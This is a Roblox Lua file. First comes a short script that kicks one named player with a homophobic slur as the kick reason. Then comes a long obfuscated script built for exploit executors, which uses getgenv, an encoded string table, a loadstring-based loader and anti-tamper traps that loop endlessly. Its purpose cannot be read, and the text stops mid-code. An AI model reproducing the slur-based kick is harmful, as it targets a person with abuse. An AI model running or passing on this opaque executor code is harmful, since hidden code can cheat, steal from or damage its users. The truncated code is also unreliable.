game.Players.PlayerAdded:Connect(function(player)
    local targetUsername = "mamskds22"
    local kickReason = "Kick por ser un puto gay"
    
    if player.Name == targetUsername then
        player:Kick(kickReason)
    end
end)


--[[ obfuscated @ xd ]]
return(function(...)local m={`PaYvMnm=`,`twxh`,`XtZm`,`HkoSVjd=`,`7gaK0U==`,`wIL2KUd=`,`LVyH`,`RSmYizc=`,`qmYa`,`i7x+mQU=`,`byEgL2t=`,`+U==`,`owW1Ht==`,`Euy2KP4=`,`6OrGzc==`,`g+4RxU==`,`ZVzthqt=`,`bPoo3ii=`,`LQ1yjN6=`,`+j1o5lc=`,`VahNCJd=`,`jm1x2nh=`,`EOj21t==`,`tVO9`,`vBE6N96=`,`YGLm`,`Iu//2Hm=`,`0VEoIu==`,`Mt7j`,`Z0ohU34=`,`7P3gcha=`,`7tm=`,`VAwySu==`,`Gehl50U=`,`QBY5CQt=`,`hhP9Sc==`,`nsqFE7g=`,`t3GY`,`lCDudMi=`,`Gnp2xU==`,`bVkVirt=`,`Zof+dc==`,`wU+MJOa=`,`V3/BYU==`,`Pwt0cvm=`,`Kt==`,`RUo9ek3=`,`D1x=`,`tc==`,`Aqr3Gfg=`,`9cALOTc=`,`i+OeqYr=`,`AnDOac==`,`7u==`,`ARTofAu=`,`BhrN`,`EKQeac==`,`01T9AQc=`,`odJd8c==`,`YovEZ5u=`,`BWMRct==`,`yb6tMc==`,`f9OngJa=`,`3JmCU8c=`,`ANHWwcd=`,`Ehy7`,`XJG14Y6=`,`Nm/Shy3=`,`o5gzxu==`,`bWW8pwc=`,`EWYKCn260jSfCc==`,`0j15EXh=`,`wJ1Cj+6=`,`CEqpyf4=`,`99rCnc==`,`HMrU`,`7MTszO4=`,`y/rtny3=`,`Kgt=`,`bL8iLC0=`,`zSfpdF3=`,`2YDOSnt=`,`T9khZwx=`,`9YJ02R0=`,`0Cl2qjd=`,`shFi`,`9CIPc64=`,`24KBCu==`,`t81LQU==`,`iD3=`,`tferYt==`,`1Le2`,`Slaj/xg=`,`02PB0zh=`,`71fVzEi=`,`SK60VNa=`,`dpBHg2a=`,`ZFiPqU0=`,`1h+CKLu=`,`Smi=`,`DrNr`,`Dq1QAu==`,`3u==`,`8YJqNgd=`,`vEe9npc=`,`sZyejmu=`,`yzfTeU3=`,`DwqChzh=`,`Kv08`,`+WgH5I3=`,`qV4ufpa=`,`3c==`,`wpxh6Qx=`,`VpUVhdg=`,`E+ln2E6=`,`Pdl4qtu=`,`/HPs`,`LrmIft==`,`APxlR/d=`,`U0fO`,`Kxe2Htm=`,`inXu`,`1c==`,`h0j4SGi=`,`eE3dhu==`,`WlRXcEU=`,`hzJ6mQu=`,`usGYa+a=`,`+Qq0Hc==`,`4R78Zuu=`,`behaEnx=`,`4oNg9Ym=`,`CoT0`,`mlQa`,`f6X733x=`,`3UoQ3u==`,`5JeXWC4=`,`WJ8GnU==`,`3dPT9n0=`,`wfFymt==`,`/daKYUU=`,`SyMthga=`,`nE6a`,`n3oFFU==`,`AEv6jrh=`,`DuemTut=`,`ZZP3`,`C+HDkt==`,`X8Es6Lx=`,`hAaWWL6=`,`UUaszIt=`,`qDViCma=`,`4kxf`,`xK3Q82U=`,`tw/M`,`nWqXVu==`,`Q31F`,`9/Ach/2v`,`mTbvWc==`,`Pu==`,`4nzpzF0=`,`EAHdu6U=`,`E7W8Lc==`,`9x+4wZ6=`,`umsb/fd=`,`sYnZw7c=`,`nKKODXi=`,`P9WL`,`Z1Ijsti=`,`PbA1`,`VcUyRdg=`,`HGMwuda=`,`w/YKIId=`,`912r`,`G8UF9Rm=`,`IU==`,`RL+2dY6=`,`OfNc4I3=`,`54fG914=`,`vsjx5Ha=`,`65uHsPh=`,`DlbkGOy+G6SC`,`VjdoaGU=`,`a4M4jm0=`,`CHBK9W2g`,`XC5unw4=`,`eU==`,`d1TK+K3=`,`2LP240t=`,`3+1508oXhQ3UeW18CDuLMt==`,`saT5`,`xv4t`,`wnEKeDx=`,`Zw6pulx=`,`qNFOfMh=`,`B7Wid6x=`,`1aKYgt==`,`M14u`,`33fF/c==`,`s94Sf56=`,`ait=`,`L+J0dSu=`,`xpPE5W6=`,`Ik+d`,`//Lorzm=`,`iS9X`,`d0UAqCd=`,`VipMeU==`,`jApy6Yt=`,`/r1hXu==`,`CKlRLc==`,`kU==`,`oTYMFgx=`,`fz167u==`,`Y69gac==`,`J9kN6u==`,`pJ3=`,`qucBht==`,`cQ1qQs0=`,`GO8lrPr=`,`PGg1YYU=`,`OESz1h0=`,`ec==`,`UMjRHWr=`,`dMj7MCt=`,`Q3fqJu==`,`CW+2oW4=`,`vSIVI2d=`,`zf9g4Vh=`,`Jv6U7Z0=`,`eN9Voc==`,`djlY6Wd=`,`Xwkkuog=`,`qPrHuu==`,``,`wNNX5oi=`,`3FwE12d=`,`blNHTw3=`,`en6=`,`jl+B6t==`,`PUOzoht=`,`4Vc=`,`PY/10q6=`,`qryasZU=`,`6Mre77c=`,`3pGbNLU=`,`WVt=`,`myuU1uc=`,`x34CXRh=`,`iJlR+u==`,`ySVSSt==`,`D++Dhc==`,`+LUM`,`BdlRMva=`,`6gyBkL3=`,`buvx`,`dgSvzsx=`,`45Fk`,`Ki6IZBu=`,`wC+1WWi=`,`0xRpqq3=`,`X5r4FI6=`,`qcf5Lu==`,`KRIp0f4=`,`iWYRVMt=`,`L0fvQ0t=`,`/xKyDYa=`,`LkLkFjm=`,`v+9Za9g=`,`x8i=`,`sZgttc==`,`VtGoZG0=`,`ohAG2t==`,`yPes6Fg=`,`N4gVOmU=`,`BYB95Lt=`,`G2PH`,`LTrhxc==`,`MtP6`,`6TBj`,`OU2Lzt==`,`329nusx=`,`CPc=`,`zCWUAJ6=`,`+HF0Cc==`,`faLtuCi=`,`a327+/a=`,`54DyOKh=`,`pY2d4t==`,`1CVKr70=`,`Krsgb/6=`,`dgU0K8U=`,`zT0SSEt=`,`XnKYiti=`,`/sU=`,`FaJhSU==`,`U26B17d=`,`f4x6Sna=`,`N1SMg+m=`,`nV15wt==`,`pQZv186=`,`hHYfhHl6`,`41mST4t=`,`ZCAVaK6=`,`G/cA5xa=`,`YZJ8dau=`,`H/bWcBr=`,`nklf4hd=`,`v8fJkQx=`,`aQCLRU==`,`ZNjDkmU=`,`V9UCvJa=`,`GxBnsRt=`,`fBp8Dom=`,`Pjpl+t==`,`OHpYYsc=`,`Pf7lqIU=`,`HOLq8c==`,`EihDhu==`,`KtpfN2h=`,`3Gr=`,`AuQD+t==`,`PZQLlHg=`,`OU==`,`hOS6Ct==`,`Pgo4DXh=`,`HMnHL7r=`,`Y5v8At==`,`eICF`,`PcwH6J6=`,`+StUI34=`,`R+ggx3d=`,`Wr1g`,`Cj7REX4=`,`qK2ag0a=`,`hmCgKri=`,`TKjcSTh=`,`eIuqnYm=`,`Uc==`,`ou==`,`6cbpiSd=`,`dkwE5l3=`,`GKe65c==`,`0jlfCWY5`,`0UR+0U==`,`5VFdfc==`,`2MkIy9x=`,`mt==`,`p9u=`,`ukYvOc==`,`0X/R`,`6U==`,`L2A4`,`t/VP`,`czpEAcc=`,`ypZ2eU==`,`W/hd`,`R5A4b/m=`,`gd9f4c==`,`pIm45t==`,`HTZ9fc==`,`9mqGvwm=`,`Rt==`,`CAU=`,`+DvTnPu=`,`knbr`,`poLt+t0=`,`zu==`,`AK6=`,`aeuwHt==`,`chHGqqu=`,`FJi=`,`Bu==`,`eCQFY7c=`,`he0=`,`kxLiLwx=`,`dZfXu5r=`,`AL/hmu==`,`rhiVwxd=`,`cc==`,`m273sec=`,`sdP/eSU=`,`Tm9XDe4=`,`gDa=`,`ueKD0jc=`,`tTui/Cu=`,`YKohkTg=`,`6t==`,`rUbjGxU=`,`cU7vch4=`,`hEhkvmg=`,`7vfwAat=`,`3GnbnP0=`,`CHujBwt=`,`3O2AYG6=`,`peSW`,`qbU=`,`6uVKrL6=`,`22L6120=`,`DEt=`,`XjMTmfx=`,`oI3=`,`MG1d`,`/c++Kz3=`,`fc+i`,`MnuuLOu=`,`UekJzxm=`,`S618jjd=`,`nxjz2U==`,`GDzyMlr=`,`NNsjXt4=`,`yag0g9r=`,`ARVrscc=`,`ft4mzZh=`,`8yf3D2t=`,`zRq8w+g=`,`zQJ5l8r=`,`7LLc9yx=`,`ljHb486=`,`hHKK0U==`,`nYcnTU==`,`lgjJoLh=`,`NTBvC7c=`,`Gpqrftm=`,`Lxr9yc==`,`d9c9XY0=`,`usprtwi=`,`GnHU`,`hu3TXV4=`,`AkDAyKu=`,`b03JWRa=`,`Mibb3da=`,`lqpScT3=`,`1sbMGQh70H1s01g=`,`wrJ5gPh=`,`BiPhYtd=`,`D3nwYM3=`,`qt==`,`Tq6=`,`05ukGt==`,`/v7N9Ei=`,`3pl3XZU=`,`uea=`,`QW00+1t=`,`KlWWUm0=`,`w76eM6a=`,`68rO`,`Vc==`,`MOuAcHr=`,`5raA3ag=`,`hQyKhjc=`,`DE/inc==`,`kkub0+a=`,`GHqlzg6=`,`qxqVrTg=`,`PGc=`,`CWpWwzg=`,`OSbJBZr=`,`ACAWCSg=`,`e8WBPd4=`,`EPoHQU==`,`KyonoU==`,`LfB3Fu==`,`Ijyr`,`+OoC/7r=`,`3FDC0SU=`,`fUXtNTc=`,`Vt==`,`OV6IXGd=`,`7E6=`,`92nFLVg=`,`kVHxC8c=`,`1Ngfq36=`,`tr4Kyu4=`,`kEg=`,`lxslxlU=`,`RI5Pvt==`,`jYlxmu==`,`jbgYYpi=`,`HR36Jou=`,`lBpvTSh=`,`Fctnit==`,`JRa=`,`0G0=`,`kGt=`,`FI9Q6gU=`,`0jlfCWx=`,`GyMqlWu=`,`i05PiDi=`,`L5LFxDu=`,`9X0Yuic=`,`eb4eTKd=`,`F/QFNzi=`,`5C2D`,`WCNkpU==`,`Gcgrg8a=`,`35hjEu==`,`7kXdOU==`,`9triOc==`,`SxeA`,`+dGvS0a=`,`cycDgu==`,`go3hVqU=`,`AoML9Xt=`,`Lriujid=`,`mezrzBa=`,`WCDwaId=`,`RC5pFtu=`,`5fxb`,`SaSZjAh=`,`9Ugrrcx=`,`/GiqLw4=`,`/Tw+fBU=`,`rH5wSU4=`,`zORufti=`,`ywD98t==`,`y/aJTVu=`,`+vqQDPc=`,`5vZ8r/a=`,`iU==`,`e2/JjXt=`,`gxowgAu=`,`fZtHC96=`,`RmsRh7t=`,`spe6VAg=`,`23XoQzt=`,`gsub5dr=`,`8JHPjtr=`,`4u==`,`Ho6=`,`R6Yvepd=`,`Vbwj`,`89OXRog=`,`B7a4+7u=`,`4DWrSa4=`,`dBfNWO6=`,`4Iaq`,`mkDwXU==`,`eOFSDe0=`,`xzfe`,`dCZY`,`ffqSNvu=`,`6qa4oDd=`,`F+hG`,`cxnb+Lt=`,`Rnr+4o0=`,`g2L2w2i=`,`TIbrAlr=`,`8NefPj6=`,`oosxcFu=`,`t5AXAwx=`,`hlYUWc==`,`UeNPXxU=`,`0dUX`,`TUty`,`Oc==`,`xu2iit==`,`gtm=`,`3XU=`,`SKefSbm=`,`mXz5RVa=`,`qT9w6U==`,`GJsxWFr=`,`UZdm6Ta=`,`81No`,`2U==`,`to/rORi=`,`Pc==`,`Q66cvNg=`,`CwTxARg=`,`K8G0Qbx=`,`nSbFTOU=`,`edBi`,`xOGpMt==`,`Dzq5Beg=`,`89cR0Sc=`,`EEUcMsU=`,`PAqvy9U=`,`RH0/cXh=`,`Et==`,`2EeaC10=`,`aba=`,`LHovlK4=`,`cUgVnVi=`,`J1SVzNi=`,`Am8rIc==`,`hmy6mu==`,`9sZcK/m=`,`Wc==`,`vq4d/B0=`,`xHCdjvm=`,`SJ801u==`,`kwUSCTgNkU==`,`F/ADJu==`,`/5jsX9t=`,`+BI0+s4=`,`/328VN3=`,`pSEHst==`,`AIBgCmg=`,`sHQ/Mn3=`,`mKF44R3=`,`ZU==`,`IkG+dFu=`,`kU7x`,`a0JG8St=`,`QEWW`,`lYvBSu==`,`dyC7gw3=`,`FrxZ1im=`,`ZR3L46g=`,`9QNxGp3=`,`yi+7`,`REjuwMc=`,`PckJdK6=`,`ADV+WJ0=`,`SY+rH7c=`,`trSMOHa=`,`m4uQ`,`hU==`,`rIFsGnc=`,`623Tdih=`,`mSPEafg=`,`F7pKa76=`,`NTt=`,`MHGfGhm=`,`eRYk`,`cHqYZU==`,`gU==`,`ChMJwx3=`,`Apm28Dm=`,`G2mGYSt=`,`giSSAU==`,`oImMV0u=`,`ha53XW4=`,`Y+i4/eh=`,`y1Ffxt==`,`Ks1gQVg=`,`C83ULei=`,`0OqU`,`svmL`,`JZMy8u==`,`D5c5ZVi=`,`1f0FfT3=`,`DDo5C/YX4WrUEWY64t==`,`chgFEBU=`,`ckSr`,`ZoE9Ka0=`,`dX3=`,`Xo387Vt=`,`xKswXeu=`,`2QnbV43=`,`5X0VdxU=`,`mepB5Md=`,`qJdoV7u=`,`NY40`,`E7J1V2d=`,`UjU=`,`wpoNVt==`,`l6nTWGu=`,`bDuKWB0=`,`Q4b7j20=`,`J4QJGu==`,`OQ/Lwza=`,`5Syc`,`i6FXbu==`,`SsU=`,`cZ5+Jjc=`,`p/j/`,`XZ4HXNc=`,`MEv/MJx=`,`GwMYsPd=`,`iI8usxi=`,`CQU=`,`1CFIPx4=`,`q7ab0+i=`,`w2AM`,`Eo1Eqz6=`,`GIXfh1h=`,`FsfIvUx=`,`+HDb/Wa=`,`GVVcWk4=`,`VzEg/lm=`,`2eGp5Wc=`,`+GoFMu==`,`W9jeup0=`,`y12wmCg=`,`QKtN`,`p37s9qg=`,`MLrgkFh=`,`Ibs8`,`qp7ySU==`,`rnl1`,`o/8FicU=`,`85BV`,`lG5im0t=`,`XjcOUU==`,`m+E4/Cg=`,`46cJPVh=`,`pY80IIt=`,`n5YZCO6=`,`Pq7mOe0=`,`BDVMWc==`,`rG87ot==`,`1t==`,`U2MwAl0=`,`+apc`,`EWYKCu==`,`q54=`,`f+g=`,`jg3=`,`bASFp+d=`,`S+a7FU==`,`XmtBPt==`,`irhPl8g=`,`eeTUzZx=`,`K69h`,`O2ye4Bt=`,`Vd4=`,`aAgi`,`TXa0M50=`,`5Nh6fSx=`,`Gc==`,`BHclPqg=`,`dtIxCPc=`,`lc==`,`W+Xx4F3=`,`8tIWnn0=`,`aO8Bhda=`,`oY78lU==`,`4mtw`,`d1x=`,`K+My9fh=`,`RATQou==`,`b4+lkc==`,`YU==`,`XIxbzpi=`,`fwhd0zg=`,`876Ukc==`,`Q8Ovajr=`,`XhfdrKg=`,`kUws7t==`,`V4rfxMi=`,`FM09JNr=`,`ur73/c==`,`ZAzAH56=`,`b9i=`,`btRWTZg=`,`LIG7vr0=`,`eGhaty0=`,`lZpyZHi=`,`d40=`,`KurcXz3=`,`XaA45Wa=`,`RIs72QU=`,`oLzieH3=`,`AU3=`,`uYHv4Lu=`,`s0hM`,`KwaK`,`mHc19rg=`,`y90=`,`Sx0Ofc==`,`1EqY/Zc=`,`3R81zSU=`,`HNSz5eU=`,`PsWE72U=`,`i7nPXGt=`,`+7bS`,`+SNR9ci=`,`dPduWk4=`,`wbxgvCd=`,`RMpbuR6=`,`PLq73yU=`,`wPRSIu==`,`WZvWuOt=`,`0j169Qbf4no+h/7mMWCBEj26e/YfMTS8CQyB0jiU3Dxwh/b+4j1fCTd=`,`in+m/w6=`,`LRbhvc==`,`3fwBOya=`,`qe4HZV4=`,`/+iD2kh=`,`/Up8w0m=`,`s1UEFAa=`,`4FptBId=`,`D32A+It=`,`9mpg`,`QRDE`,`FH4Q6Wd=`,`qGAAEGg=`,`Yc==`,`v83H3Vt=`,`TRJmEEa=`,`QBYNEjt=`,`zc==`,`EZtPSt==`,`W+fod6r=`,`durS/c==`,`W1fZ1pr=`,`WwQ5yCt=`,`RIyCgQr=`,`Ew5fDc==`,`TUTWZ9r=`,`9oTokir=`,`9La=`,`gaTl`,`TCXS76g=`,`u/YCMhh=`,`j4vv3h6=`,`Bl6=`,`QU==`,`X9RR3Fd=`,`Qopresa=`,`9Fwepwa=`,`wg43Wr0=`,`33t18ht=`,`FE3ZdU==`,`AtNr1wr=`,`VQCuggr=`,`F4s0MLg=`,`bvMf`,`7ryy8Rd=`,`Mc==`,`2gFSli3=`,`JE1GkU==`,`QZLTZAg=`,`rkPD35g=`,`CXaS234=`,`vU==`,`cIkdoc==`,`Tra=`,`Wr7JcO3=`,`kPPZpM3=`,`CZSqFNa=`,`xdl+CLU=`,`yL6=`,`Cv31gm4=`,`oV+sbh0=`,`FgFeQ7U=`,`UHwM25x=`,`Xet=`,`524=`,`zIrdSDu=`,`Nhsu`,`KUzik9r=`,`Nt==`,`FirGoX0=`,`0qHcr8c=`,`dJx=`,`XY5tmIr=`,`oRa9`,`HRqKB63=`,`/aYZOqg=`,`3Q233O2HpaBOydBt2Q2k`,`ii3wUbx=`,`xbU2nLU=`,`9TzgQjx=`,`qWlPRfi=`,`IO8Idt==`,`n6VVWLu=`,`cfFqvk4=`,`4t==`,`VEu=`,`WA63SAm=`,`UqwcHu==`,`ptEM`,`JbtyoQr=`,`+eVvhox=`,`uU==`,`dralEFr=`,`hbQP0c==`,`cSrN0Yc=`,`oL+qac==`,`UDpUxUt=`,`K9i=`,`sNxEs4u=`,`alYU8rc=`,`Ct==`,`0u==`,`vh6d3Mi=`,`35mC`,`8dbFKU==`,`Eu==`,`Qq+MxI4=`,`ju==`,`3ntp`,`1IODh+i=`,`04Di0st=`,`fAFoFZ6=`,`STUZFKi=`,`zwkdplt=`,`hq8m`,`tW0oBv3=`,`X6qi`,`s/CZZdd=`,`brXx`,`bw5ox20=`,`YH9LpFg=`,`St==`,`Wp3kBY3=`,`JttxEU==`,`tYWJkZ6=`,`Breh`,`HtuL5ha=`,`+0XR7wt=`,`yHsHSXr=`,`wb+3cEx=`,`3Ljvrec=`,`0P3Gr1i=`,`JvOFWRa=`,`IuviWc==`,`pxTWxTx=`,`BCO3`,`1WzRk9g=`,`Q0zl/46=`,`N5eqZFd=`,`i03jNEx=`,`cGm5ku==`,`qjAxgc==`,`r6daqHa=`,`jvTfinm=`,`Yj+LGc==`,`l7eyzRt=`,`EW1f`,`Lkh=`,`qqdR`,`rvI+qFt=`,`B86O9u6=`,`k8m=`,`gpxy9ad=`,`+6oIZMh=`,`aBGQ2F4=`,`TObS9n18EwochHlmETKj9/A+9WSREwUN0j169Qbf4zrR4jlwh8bSEjtN`,`5YpDdRr=`,`sjLxMt==`,`wt3=`,`Zu8l9H3=`,`+t==`,`tsI5G/d=`,`z5GAnZ0=`,`hieMdS4=`,`tbNf`,`UKFeoiu=`,`gvYJyMr=`,`nMmy`,`kIYm8J6=`,`zwXEuU==`,`jLXNpXh=`,`6u==`,`dHMzOPd=`,`9E6=`,`bF7i`,`zkRYWt4=`,`JEk/zU6=`,`xEhbalt=`,`R7Xj1bu=`,`DEql90d=`,`Wt==`,`WXsI`,`sbKn6H4=`,`5Fi=`,`il1a`,`ftPC`,`tW7BEjaREn1K9t==`,`2t==`,`agqZ`,`EQu=`,`zLVhODu=`,`mvg=`,`t5hhMn6=`,`PwtMsT3=`,`ehgyuu==`,`qf2s8lm=`,`0npbKau=`,`Vu==`,`X8T+syt=`,`Xd3=`,`RTGx`,`S3L6`,`YOiJcic=`,`wm8+qu==`,`AthEsr6=`,`Rc==`,`Uu==`,`CjSNHbd=`,`3Wg=`,`nMA7ZM4=`,`WjFsjH6=`,`YfJYsU==`,`A5HoU+4=`,`uB4IKxa=`,`7U1/vm3=`,`e7IQit==`,`+CTIFx6=`,`G+r=`,`dvTE`,`Kb0YVIi=`,`53g=`,`CsMkgU6=`,`kqlZ`,`z23HV8U=`,`OhWmpQa=`,`lqgUR4x=`,`lAdQ`,`vLiexU==`,`RdpMdt==`,`E/N5NIc=`,`URvXyU==`,`Z1kCOnh=`,`qZmw`,`ezm6Xu0=`,`uVvuALr=`,`lq6=`,`CLbKpyg=`,`lWzQtCt=`,`dzSu4cr=`,`Ssag`,`6c51`,`7tWZvt==`,`W5hNEy3=`,`rU==`,`+Tpg0su=`,`oQkHOv4=`,`p2bJnju=`,`Nm4GpZd=`,`1O/Gwc==`,`2P1eR1g=`}local function t(Y)return(m)[Y-40886]end for Y,a in ipairs{{1,1026},{1,943},{944,1026}}do while(a)[1]<(a)[2]do(m)[(a)[1] ],(m)[(a)[2] ],(a)[1],(a)[2]=(m)[(a)[2] ],(m)[(a)[1] ],(a)[1]+1,(a)[2]-1 end end do local Y,a,i,t,g,e,K,P,A=string.len,m,table.insert,math.floor,string.sub,string.char,{N=41,[`7`]=49,v=43,[`6`]=52,y=17,O=39,e=26,c=48,[`+`]=35,[`/`]=22,d=36,I=15,X=55,f=46,[`8`]=50,k=14,h=24,Q=23,m=44,o=1,S=37,q=59,[`5`]=45,R=47,p=30,Y=61,[`1`]=21,z=3,[`3`]=12,[`0`]=28,C=25,W=6,V=31,n=7,a=20,r=4,l=5,K=33,[`4`]=8,H=54,F=62,L=58,t=16,b=9,M=10,U=32,[`2`]=13,s=51,j=38,[`9`]=29,u=0,E=27,P=11,J=42,G=19,T=2,Z=63,g=40,w=34,A=57,D=18,i=56,B=53,x=60},type,table.concat for m=1,#a,1 do local V=(a)[m]if P(V)==`string`then local P,H,L,U,s=Y(V),{},1,0,0 while L<=P do local Y=g(V,L,L)local a=(K)[Y]if a then U=U+a*64^(3-s)s=s+1 if s==4 then s=0 local Y,a,m=t(U/65536),t((U%65536)/256),U%256 i(H,e(Y,a,m))U=0 end elseif Y==`=`then i(H,e(t(U/65536)))if L>=P or g(V,L+1,L+1)~=`=`then i(H,e(t((U%65536)/256)))end break end L=L+1 end(a)[m]=A(H)end end end do local Y=true pcall(function()((getgenv()))[t(40993)]=function()end end)local a,i,m=(string)[t(40988)],function()error(t(41447))end,false local g,e,K,P=pcall(function()m=true end)and m,(math)[t(41147)],(table)[t(41105)],table and(table)[t(40961)]or unpack local A,V,H,L=e(3,65),0,0,{pcall(function()local Y=11559690-t(41656)^14532069 return t(41357)/Y end)}local U=(L)[2]local s=tonumber((a(tostring(U),t(41396)))())for i=1,A,1 do local m,g=(math)[t(41147)](1,100),e(0,255)local K,L,o=e(1,m),e(1,2)==1,U:gsub(t(41396),t(41015)..(tostring(e(0,10000))..t(41015)))local F={pcall(function()if e(1,2)==1 or i==A then local i=tonumber((a(tostring((({pcall(function()local Y=9199620-t(40985)^10793056 return t(41237)/Y end)}))[2]),t(41396)))())Y=Y and s==i end if L then error(o,0)end local V={}for Y=1,m,1 do(V)[Y]=e(0,255)end(V)[K]=g return P(V)end)}if L then Y=Y and((F)[1]==false and(F)[2]==o)else Y=Y and(F)[1]V=(V+(F)[K+1])%256 H=(H+g)%256 end end local o=loadstring or load or((getfenv(print)))[t(41510)]or((getfenv(print)))[t(41900)]if not o then local Y,a=pcall(function()return require(t(41766))end)o=a and(a)[t(41510)]end local F=true if o then local Y,i=tonumber((a(tostring((({(o(t(41579)))()}))[2]),t(41396)))()),tonumber((a(tostring((({(o(t(41735)))()}))[2]),t(41396)))())F=Y~=i end Y=Y and(V==H and F)local X=not Y and i()if Y then else repeat return(function()while true do l1,l2=l2,l1 i()end end)()until true while true do l2=e(1,6)if l2>2 then l2=tostring(l1)else l1=l2 end end return end end local i,a,Y=function(Y)local a,i=(Y)[#Y],t(41038)for m=1,#a,1 do i=i..(a)[(Y)[m] ]end return i end do local m,g,e,K,P,A,V,H,L,U=(math)[t(41137)],(math)[i{1,2,{t(41290),t(41383)}}],(table)[i{2,1,{t(41680),t(41901)}}],(string)[t(41223)],0,2,{},{},0,{}for Y=1,256,1 do(U)[Y]=Y end repeat local Y=g(1,#U)local a=e(U,Y);(H)[a]=K(a-1)until#U==0 local s={}local function o()if#s==0 then P=(P*153+31175027109425)%35184372088832 repeat A=(A*194)%257 until A~=1 local Y=A%32 local a=(m(P/2^(13-(A-Y)/32))%4294967296)/2^Y local g=m((a%1)*4294967296)+m(a)local e=g%65536 local K,V=(g-e)/65536,e%256 local H,L=(e-V)/256,K%256 local U=(K-L)/256 s={V,H,L,U}end return(table)[i{1,2,{t(41901),t(41680)}}](s)end local F={}a=setmetatable({},{[i{2,1,{t(41476),t(41596)}}]=F,[i{1,2,3,{t(41864),t(41254),t(41680)}}]=false})function Y(a,i)local m=F if(m)[i]then else s={}local Y=H P=i%35184372088832 A=i%255+2 local g=(string)[t(41726)](a);(m)[i]=t(41038)local e=205 for g=1,g,1 do e=(((string)[t(41128)](a,g)+o())+e)%256(m)[i]=(m)[i]..(Y)[e+1]end end return i end end return(function(m,e,K,P,A,V,H,L,N,T,X,x,Q,s,S,y,U,g,o,j,F,B,c,G,...)o,j,L,x,B,X,S,G,Q,s,U,y,g,T,N,F,c=0,function(Y,...)(U)[Y]=(U)[Y]-1 if 0==(U)[Y]then(U)[Y],(L)[Y]=nil,nil end end,{},function(Y,a,...)local i=F(a)local m=function(...)return g(Y,{...},a,i)end return m end,function(Y,a,...)local i=F(a)local m=function(m,t,e,K,...)return g(Y,{m,t,e,K},a,i)end return m end,function(Y,...)local a,i=1,(Y)[1]while i do(U)[i],a=(U)[i]-1,a+1 if(U)[i]==0 then(U)[i],(L)[i]=nil,nil end i=(Y)[a]end end,function(Y,a,...)local i=F(a)local m=function(m,t,e,K,P,...)return g(Y,{m,t,e,K,P},a,i)end return m end,function(Y,a,...)local i=F(a)local m=function(m,t,...)return g(Y,{m,t},a,i)end return m end,function(Y,a,...)local i=F(a)local m=function(m,t,e,K,P,A,V,H,L,...)return g(Y,{m,t,e,K,P,A,V,H,L},a,i)end return m end,function(...)o=o+1(U)[o]=1 return o end,{},function(Y,a,...)local i=F(a)local m=function(m,t,e,...)return g(Y,{m,t,e},a,i)end return m end,function(g,K,P,A,...)local k,z,p,gh,Yh,w,mh,M,D,R,o,th,h,U,r,u,O,W,ah,Hh,J,l,x,n,H,q,Lh,ih,Z,C,sh,Uh,oh,Ph,X,Ah,I,v,eh,d,f,b,E,Vh,Kh,F while g do if g<8714803 then if g<4527411 then if g<2442186 then if g<1230124 then if g<577512 then if g<312288 then if g<117810 then if g<68862 then C=(L)[X]g=C and 1493692 or 11670502 else C=(a)[Y(t(41099),29196162904507)]X=(a)[Y(i{1,2,3,{t(41850),t(41218),t(41589)}},3119500401102)]U=(K)[1]F=(U)[X]Z=(m)[C]C=(a)[Y(i{3,1,2,{t(40983),t(41836),t(41379)}},29434434153257)]x=(Z)[C]Z=(a)[Y(i{1,3,2,{t(41388),t(41451),t(41602)}},32208196826530)]X=(x)[Z]o=F==X H=o g=o and 2698270 or 9642500 end else if g<267159 then U=(a)[Y(t(40905),20649723837604)]H=(m)[U]U=(a)[Y(t(41334),9833541485474)]g=(H)[U]U=T(5041273,{(P)[2],(P)[3]})H=g(U)g=3405031 else Z=(L)[f]g=Z and 5672688 or 7439505 end end else if g<488868 then if g<332169 then O=(a)[Y(i{2,1,{t(41561),t(41438)}},4289995435756)]v=(a)[Y(t(41673),6760268833670)]d=(m)[O]w=(m)[v]v=(a)[Y(i{1,2,{t(41226),t(41625)}},9689256738485)]r=(w)[v]w={r()}b=(a)[Y(t(41081),30977255830229)]r=(a)[Y(i{1,2,{t(41588),t(41061)}},30164084652067)]g=6042434 O=d(e(w))d=(m)[r]v=(m)[b]b=(a)[Y(i{1,2,{t(41475),t(41740)}},3202164413185)]w=(v)[b]v={w()}r=d(e(v))M=O==r C=M else g=574742 end else if g<547834 then H={w}g=(m)[(a)[Y(i{3,2,1,{t(41513),t(41276),t(41717)}},24490582246286)] ]else x=true g=x and 480458 or 13546875 end end end else if g<815444 then if g<664651 then if g<652573 then o=(a)[Y(t(41871),21634082659191)]H=(m)[o]o=(a)[Y(t(41791),21522311350196)]g=(H)[o]o=0.3 H=g(o)g=(L)[(P)[4] ]H=(a)[Y(i{3,1,2,{t(41025),t(41512),t(41719)}},20467623336392)]H=(g)[H]H=H(g)g=8697680 else E=(L)[v]k=(a)[Y(t(41014),30496404389321)]J=(a)[Y(t(41397),17781012061951)]I=(h)[k]k=(u)[J]z=I==k R=E(z)E=(L)[v]k=(L)[v]q=(a)[Y(t(41054),16463077101671)]p=(h)[q]Yh=(a)[Y(t(41516),30540936651145)]J=k(p)k=(L)[v]q=(u)[Yh]p=k(q)I=J==p z=E(I)b=R~=z g=b and 4419213 or 4611568 end else if g<772068 then C=B(12972628,{})Z=(a)[Y(t(41741),735858927526)]H=(m)[Z]x=U x=nil g=9180789 Z=H(C)else l=d()O=1 l=d(O)g=3418282 end end else if g<1071761 then if g<988173 then f=(a)[Y(t(41668),14937943471773)]n=(a)[Y(i{2,1,{t(41882),t(41868)}},33132956610511)]x=F f=(Z)[f]f=f(Z,n)g=f and 16463031 or 5255811 C=f else o=(a)[Y(t(41280),33379396224019)]g=(L)[(P)[4] ]H=(a)[Y(i{2,1,{t(41173),t(41284)}},7880287363453)]H=(g)[H]H=H(g,U)H=(m)[o]o=(a)[Y(t(41043),34198931730191)]g=(H)[o]o=0.1 H=g(o)g=(a)[Y(t(40904),21027439128934)]H=(a)[Y(t(41066),20210326535502)]g=(U)[g]g=g(U,H)g=g and 1851529 or 609287 end else X=(a)[Y(i{2,1,{t(41519),t(41432)}},8634704266654)]F=(m)[X]x=(L)[(P)[1] ]Z={x(o)}g=(m)[(a)[Y(i{1,2,3,{t(41411),t(41856),t(41728)}},1336973282410)] ]X={F(e(Z))}H={e(X)}end end end else if g<1851546 then if g<1693103 then if g<1388732 then if g<1261360 then u=(a)[Y(t(40921),28584705323859)]g=11033043 h=(m)[u]v=h else D=n~=X M=D g=13477819 end else if g<1474772 then q=q+ah mh=not ih p=q<=Yh p=mh and p mh=q>=Yh mh=ih and mh p=mh or p mh=13624368 g=p and mh p=9350851 g=g or p else 